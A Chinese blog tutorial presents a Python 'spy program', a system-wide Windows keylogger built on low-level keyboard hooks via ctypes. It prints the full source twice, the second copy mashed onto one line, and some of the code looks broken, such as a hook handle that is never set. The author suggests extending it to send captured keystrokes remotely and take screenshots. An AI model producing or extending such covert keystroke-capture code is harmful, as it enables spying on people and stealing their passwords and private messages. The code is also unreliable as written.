百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术资源 > 正文

使用Python打造一款间谍程序,装逼神器

off999 2024-09-20 22:40 32 浏览 0 评论


知识点

这次我们使用python来打造一款间谍程序

程序中会用到许多知识点,大致分为四块

  win32API 此处可以在MSDN上查看

  Python基础重点在cpytes库的使用,使用方法请点击此处

  C语言基础

  Hook

写到在这里还是提醒下,很多人学Python过程中会遇到各种烦恼问题,没有人解答容易放弃。为此我建了个python学习资源圈里面有2020年最新学习资料,如果你正在学python,可以关注我,后台私信我 ‘p’ 免费获取!还可以跟老司机讨论!
接下来看程序的基本原理在于通过注册Hook,记录系统事件

那么什么是Hook呢

Hook 技术又叫做钩子函数,系统在调用函数之前,钩子程序就先捕获该消息,钩子函数先得到控制权,这时钩子函数既可以加工处理(改变)该函数的执行行为,还可以强制结束消息的传递

注册Hook时我们需要先导入DLL库,在Python中我们使用ctypes来导入,导入方法如下

user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")

我们导入了user32.dll和kernel32.dll

这两个DLL有什么用处呢

  user32.dll   是Windows用户界面相关应用程序接口,用于包括Windows处理,基本用户界面等特性,如创建窗口和发送消息

  kernel32.dll  控制着系统的内存管理、数据的输入输出操作和中断处理

流程部分

知道了我们要使用什么样的工具,那么第一步应该怎么做呢

1.首先我们需要先注册Hook到系统上,通过user32.dll中的SetWindowsHookExA函数,我们可以在系统上注册钩子

HHOOK SetWindowsHookExA(
  int       idHook,
  HOOKPROC  lpfn,
  HINSTANCE hmod,
  DWORD     dwThreadId
);

通过查看文档我们看到SetWindowsHookExA函数的参数及参数类型如上所示,详细文档点击此链接查看

通过文档我们看到第一个参数idHook中填入钩子的类型

WH_KEYBOARD_LL的常量值为13代表的意思是监视低级键盘输入事件,我们此处来监听键盘事件

第二个参数lpfn代表指向钩子过程的指针,要填入钩子过程(函数),我们可以在此处来添加额外代码达到我们想要达成的目的

第三个参数hmod表示为DLL句柄,我们可以使用kernel32中的GetModuleHandleW来获取句柄

最后一个参数dwThreadId我们填入0代表与同一桌面上所有的线程关联

代码如下

user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)

如何使用Python来编写我们的钩子过程呢,通过ctypes文档我们可以得知windows下使用WINFUNCTYPE来创建函数

此时我们发现有WINFUNCTYPE和CFUNCTYPE两个函数,具体要使用哪一个呢,这两个的区别为

  WINFUNCTYPE  为Windows下独有的,通过使用使用stdcall调用约定的函数

  CFUNCTYPE   使用标准C调用约定的函数

HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))

因为我们调用的是WH_KEYBOARD_LL,WH_KEYBOARD_LL会使用LowLevelKeyboardProc回调函数,同时我们也需要在Python定义它

LowLevelKeyboardProc数据结构如下

LRESULT CALLBACK LowLevelKeyboardProc(
  _In_ int    nCode,
  _In_ WPARAM wParam,
  _In_ LPARAM lParam
);

按照官方文档提示 如果nCode小于零,则挂钩过程必须将消息传递给CallNextHookEx函数,而无需进一步处理,并且应返回CallNextHookEx返回的值

我们转换为Python代码

class KBDLLHOOKSTRUCT(Structure):
    _fields_ = [
        ('vkCode', DWORD),
        ('scanCode', DWORD),
        ('flags', DWORD),
        ('time', DWORD),
        ('dwExtraInfo', DWORD)]

def hookProc(nCode, wParam, lParam):
    if nCode < 0:
        return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
    else:
        # 此处插入我们的代码
        pass
    return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

最后在我们退出程序时还需要删除Hook,不然大量的Hook会使系统运行缓慢,虽然在Windows 7及更高版本上,该钩子会被静默删除而不被调用。应用程序无法知道挂钩是否已删除。我们还是主动进行删除

删除需要使用user32.dllUnhookWindowsHookEx,参数为Hook句柄

user32.UnhookWindowsHookEx(hooked)

下面贴上全部代码

 1 import sys
 2 from ctypes import *
 3 from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM
 4 
 5 user32 = CDLL("user32.dll")
 6 kernel32 = CDLL("kernel32.dll")
 7 
 8 
 9 class KBDLLHOOKSTRUCT(Structure):
10     _fields_ = [
11         ('vkCode', DWORD),
12         ('scanCode', DWORD),
13         ('flags', DWORD),
14         ('time', DWORD),
15         ('dwExtraInfo', DWORD)]
16 
17 
18 def uninstallHookProc(hooked):
19     if hooked is None:
20         return
21     user32.UnhookWindowsHookEx(hooked)
22     hooked = None
23 
24 
25 def hookProc(nCode, wParam, lParam):
26     if nCode < 0:
27         return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
28     else:
29         if wParam == 256:
30             if 162 == lParam.contents.value:
31                 print("Ctrl pressed, call Hook uninstall()")
32                 uninstallHookProc(hooked)
33                 sys.exit(-1)
34             capsLock = user32.GetKeyState(20)
35             # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT))
36             if lParam.contents.value==13:
37                 print("\n")
38             elif capsLock:
39                 print(chr(lParam.contents.value),end="")
40             else:
41                 print(chr(lParam.contents.value+32),end="")
42     return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
43 
44 
45 def startKeyLog():
46     msg = MSG()
47     user32.GetMessageA(byref(msg), 0, 0, 0)
48 
49 
50 def installHookProc(hooked, pointer):
51     hooked = user32.SetWindowsHookExA(
52         13,
53         pointer,
54         kernel32.GetModuleHandleW(),
55         0
56     )
57     if not hooked:
58         return False
59     return True
60 
61 
62 HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
63 pointer = HOOKPROC(hookProc)
64 hooked = None
65 if installHookProc(hooked, pointer):
66     print("Hook installed")
67     try:
68         msg = MSG()
69         user32.GetMessageA(byref(msg), 0, 0, 0)
70     except KeyboardInterrupt as kerror:
71         uninstallHookProc(hooked)
72         print("Hook uninstall...")
73 else:
74     print("Hook installed error")

贴上我们的效果图

我们还可以再添加上额外的代码比如数据传输,截屏等等 ^_^

我们常听说:如果要操作某个软件或者监听某个软件的话,可以使用钩子( Hook )钩住软件,那这是如何操作的呢?用Python又如何实现呢?

本教程我们将 通过注册Hook 打造一款间谍程序,来监听win系统的笔记本,先给大家演示下效果吧!

一、 Hook 技术

程序的基本原理在于通过 注册Hook ,记录系统事件。

那么什么是Hook呢?

Hook 技术又叫做 钩子函数 ,系统在调用函数之前,钩子程序就先捕获该消息,钩子函数先得到控制权,这时钩子函数既可以加工处理(改变)该函数的执行行为,还可以强制结束消息的传递

注册Hook时我们需要使用到两个DLL库: user32.dll kernel32.dll 。这两个DLL有什么用处呢:

  • user32.dll :是Windows用户界面相关应用程序接口,用于包括Windows处理,基本用户界面等特性,如创建窗口和发送消息
  • kernel32.dll :控制着系统的内存管理、数据的输入输出操作和中断处理

二、实现

了解了钩子的用处,那我们就来正式开始实现吧!

1.注册钩子

首先我们需要先注册Hook到系统上,通过 user32.dll中的SetWindowsHookExA函数 我们可以在系统上注册钩子。

通过查看 微软官方文档( https://docs.microsoft.com/zh-cn/windows/win32/api/winuser/nf-winuser-setwindowshookexa ) ,我们看到 SetWindowsHookExA 函数的参数及参数类型如上所示。

我们简单介绍一下关于这几个参数的含义:

  1. idHook:钩子的类型,可以监听消息、键盘、鼠标等等,这里 我们来 监视低级键盘输入事件作为案例演示!
  2. lpfn :钩子函数,这里就表示你监听到事件后要怎么处理,核心作用!
  3. hmod : DLL句柄(类似编号) , 我们可以使用 kernel32 中的 GetModuleHandleW 来获取句柄
  4. dwThreadId : 我们填入0代表与同一桌面上所有的线程关联

上图中的代码我们可以看出使用的是C++语法,这时候Python中的 ctypes库 就可以助我们一臂之力!

ctypes 是 Python 的外部函数库。它提供了与 C 兼容的数据类型, 并允许调用 DLL 或共享库中的函数 。可使用该模块以纯 Python 形式对这些库进行封装。

Python使用 ctypes库 注册钩子代码:

from ctypes import CDLL
 
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")
 
user32.SetWindowsHookExA(13, handleProc, kernel32.GetModuleHandleW(), 0)

更多关于 ctypes库 使用教程可查看Python官方文档:

https://docs.python.org/zh-cn/3.7/library/ctypes.html

2.编写钩子函数

上面我们说过 监视低级键盘输入事件( WH_KEYBOARD_LL ) 作为案例演示!

而监听键盘事件(WH_KEYBOARD_LL) 会使用 LowLevelKeyboardProc 回调函数,同时我们也需要在Python定义它!

我们再次使用Python的 ctypes库 定义一个回调函数!

defhookProc(nCode, wParam, lParam):

if nCode < 0:

return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

else:

# 此处插入我们的代码

pass

return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

3.删除Hook

最后在我们退出程序时还需要删除Hook,不然大量的Hook会使系统运行缓慢。

虽然在Windows 7及更高版本上,该钩子会被静默删除而不被调用。

但是应用程序无法知道挂钩是否已删除,我们还是主动进行删除。

删除需要使用 user32.dllUnhookWindowsHookEx。

def uninstallHookProc(hooked):
    if hooked is None:
        return
    user32.UnhookWindowsHookEx(hooked)
    hooked = None

完整的钩子函数:

defhookProc(nCode, wParam, lParam):

if nCode < 0:

return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

else:

if wParam == 256:

if 162 == lParam.contents.value:

print("Ctrl pressed, call Hook uninstall()")

uninstallHookProc(hooked)

sys.exit(-1)

capsLock = user32.GetKeyState(20)

if lParam.contents.value == 13:

print("\n")

elif capsLock:

print(chr(lParam.contents.value), end="")

else:

print(chr(lParam.contents.value + 32), end="")

return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

4.声明原型

钩子函数已经写好了,但是这是Python函数,如何将它转成c++函数呢?这样windows才能读取。

通过 ctypes文档 我们可以得知Windows下使用WINFUNCTYPE来声明函数原型!

将创建好的Python函数声明为c++函数:

# 创建声明,c_int表示函数入参类型

HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))

# 声明函数原型

handleProc = HOOKPROC(hookProc)

最后我们将已经已经声明好的函数原型 handleProc ,传入最开始注册的钩子函数里:

<span><span style="letter-spacing: 2px;">user32.SetWindowsHookExA(13, handleProc, kernel32.GetModuleHandleW(), 0)</span></span>

5.完整代码

上面的4步基本是主要的流程,一些更详细的操作这里不再过多介绍,给出全部代码,不到100行。

import sysfrom ctypes import *from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAMuser32 = CDLL("user32.dll")kernel32 = CDLL("kernel32.dll")class KBDLLHOOKSTRUCT(Structure):    _fields_ = [        ('vkCode', DWORD),        ('scanCode', DWORD),        ('flags', DWORD),        ('time', DWORD),        ('dwExtraInfo', DWORD)]def uninstallHookProc(hooked):    if hooked is None:        return    user32.UnhookWindowsHookEx(hooked)    hooked = Nonedef hookProc(nCode, wParam, lParam):    if nCode < 0:        return user32.CallNextHookEx(hooked, nCode, wParam, lParam)    else:        if wParam == 256:            if 162 == lParam.contents.value:                print("Ctrl pressed, call Hook uninstall()")                uninstallHookProc(hooked)                sys.exit(-1)            capsLock = user32.GetKeyState(20)            if lParam.contents.value == 13:                print("\n")            elif capsLock:                print(chr(lParam.contents.value), end="")            else:                print(chr(lParam.contents.value + 32), end="")    return user32.CallNextHookEx(hooked, nCode, wParam, lParam)def startKeyLog():    msg = MSG()    user32.GetMessageA(byref(msg), 0, 0, 0)def installHookProc(hooked, handleProc):    hooked = user32.SetWindowsHookExA(        13,        handleProc,        kernel32.GetModuleHandleW(),        0    )    if not hooked:        return False    return TrueHOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))handleProc = HOOKPROC(hookProc)hooked = Noneif installHookProc(hooked, handleProc):    print("Hook installed")    try:        msg = MSG()        user32.GetMessageA(byref(msg), 0, 0, 0)    except KeyboardInterrupt as kerror:        uninstallHookProc(hooked)        print("Hook uninstall...")else:    print("Hook installed error")

Windows系统的同学可以试试效果哦~

三、总结

本次教程给大家简单的介绍了下: 在Python中如何使用ctypes库调用Windows API。

当然,上面我们监听到消息之后还可以远程发送或者截屏保存等等操作都可以,最后在这里还是提醒下,很多人学Python过程中会遇到各种烦恼问题,没有人解答容易放弃。为此我建了个python学习资源圈里面有2020年最新学习资料,如果你正在学python,可以关注我,后台私信我 ‘p’ 免费获取!还可以跟老司机讨论,期待大家的骚操作哦!

相关推荐

Linux 网络协议栈_linux网络协议栈

前言;更多学习资料(包含视频、技术学习路线图谱、文档等)后台私信《资料》免费领取技术点包含了C/C++,Linux,Nginx,ZeroMQ,MySQL,Redis,fastdfs,MongoDB,Z...

揭秘 BPF map 前生今世_bpfdm

1.前言众所周知,map可用于内核BPF程序和用户应用程序之间实现双向的数据交换,为BPF技术中的重要基础数据结构。在BPF程序中可以通过声明structbpf_map_def...

教你简单 提取fmpeg 视频,音频,字幕 方法

ffmpeg提取视频,音频,字幕方法(HowtoExtractVideo,Audio,SubtitlefromOriginalVideo?)1.提取视频(ExtractVi...

Linux内核原理到代码详解《内核视频教程》

Linux内核原理-进程入门进程进程不仅仅是一段可执行程序的代码,通常进程还包括其他资源,比如打开的文件,挂起的信号,内核内部的数据结构,处理器状态,内存地址空间,或多个执行线程,存放全局变量的数据段...

Linux C Socket UDP编程详解及实例分享

1、UDP网络编程主要流程UDP协议的程序设计框架,客户端和服务器之间的差别在于服务器必须使用bind()函数来绑定侦听的本地UDP端口,而客户端则可以不进行绑定,直接发送到服务器地址的某个端口地址。...

libevent源码分析之bufferevent使用详解

libevent的bufferevent在event的基础上自己维护了一个buffer,这样的话,就不需要再自己管理一个buffer了。先看看structbufferevent这个结构体struct...

一次解决Linux内核内存泄漏实战全过程

什么是内存泄漏:程序向系统申请内存,使用完不需要之后,不释放内存还给系统回收,造成申请的内存被浪费.发现系统中内存使用量随着时间的流逝,消耗的越来越多,例如下图所示:接下来的排查思路是:1.监控系统中...

彻底搞清楚内存泄漏的原因,如何避免内存泄漏,如何定位内存泄漏

作为C/C++开发人员,内存泄漏是最容易遇到的问题之一,这是由C/C++语言的特性引起的。C/C++语言与其他语言不同,需要开发者去申请和释放内存,即需要开发者去管理内存,如果内存使用不当,就容易造成...

linux网络编程常见API详解_linux网络编程视频教程

Linux网络编程API函数初步剖析今天我们来分析一下前几篇博文中提到的网络编程中几个核心的API,探究一下当我们调用每个API时,内核中具体做了哪些准备和初始化工作。1、socket(family...

Linux下C++访问web—使用libcurl库调用http接口发送解析json数据

一、背景这两天由于一些原因研究了研究如何在客户端C++代码中调用web服务端接口,需要访问url,并传入json数据,拿到返回值,并解析。 现在的情形是远程服务端的接口参数和返回类型都是json的字符...

平衡感知调节:“系统如人” 视角下的架构设计与业务稳定之道

在今天这个到处都是数字化的时代,系统可不是一堆冷冰冰的代码。它就像一个活生生的“数字人”,没了它,业务根本转不起来。总说“技术要为业务服务”,但实际操作起来问题不少:系统怎么才能快速响应业务需求?...

谈谈分布式文件系统下的本地缓存_什么是分布式文件存储

在分布式文件系统中,为了提高系统的性能,常常会引入不同类型的缓存存储系统(算法优化所带来的的效果可能远远不如缓存带来的优化效果)。在软件中缓存存储系统一般可分为了两类:一、分布式缓存,例如:Memca...

进程间通信之信号量semaphore--linux内核剖析

什么是信号量信号量的使用主要是用来保护共享资源,使得资源在一个时刻只有一个进程(线程)所拥有。信号量的值为正的时候,说明它空闲。所测试的线程可以锁定而使用它。若为0,说明它被占用,测试的线程要进入睡眠...

Qt编写推流程序/支持webrtc265/从此不用再转码/打开新世界的大门

一、前言在推流领域,尤其是监控行业,现在主流设备基本上都是265格式的视频流,想要在网页上直接显示监控流,之前的方案是,要么转成hls,要么魔改支持265格式的flv,要么265转成264,如果要追求...

30 分钟搞定 SpringBoot 视频推拉流!实战避坑指南

30分钟搞定SpringBoot视频推拉流!实战避坑指南在音视频开发领域,SpringBoot凭借其快速开发特性,成为很多开发者实现视频推拉流功能的首选框架。但实际开发中,从环境搭建到流处理优...

取消回复欢迎 发表评论: